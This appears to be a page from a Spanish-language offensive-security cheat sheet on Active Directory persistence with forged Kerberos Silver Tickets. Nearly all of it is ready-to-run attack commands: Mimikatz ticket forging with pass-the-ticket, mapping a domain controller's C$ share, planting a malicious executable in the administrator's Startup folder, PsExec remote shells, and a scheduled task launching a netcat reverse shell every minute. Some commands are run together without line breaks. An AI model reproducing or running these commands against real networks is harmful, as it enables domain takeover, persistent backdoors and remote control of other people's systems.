Persistencia - Kerberos & Tickets
Silver Ticket
# Mimikatz
kerberos::golden /domain:domain.local /sid:SID /target:dc.domain.local /service:CIFS /rc4:RC4 /user:administrator /pttInvoke-Mimikatz -Command '"kerberos::golden /domain:domain.local /sid:Administrator_SID /target:domain.local /service:HOST /rc4:RC4 /user:Administrator /ptt"'misc::cmd#list the C$ share
dir \\\\dc.domain.local\\c$
# Map drive
net use Z: \\\\dc.domain.local\\C$
# Copy malware to Domain Administrator startup folder on DC
copy .\\MaliciousFile.exe "\\\\dc.domain.local\\c$\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
# CMD
.\\PsExec.exe -accepteula \\\\dc01.security.local cmd
# Netcat
schtasks /create /sc minute /mo 1 /tn "Persistence" /tr 'c:\\Users\\Administrator\\Downloads/nc.exe IP 443 -e cmd.exe'Golden Ticket
Last updated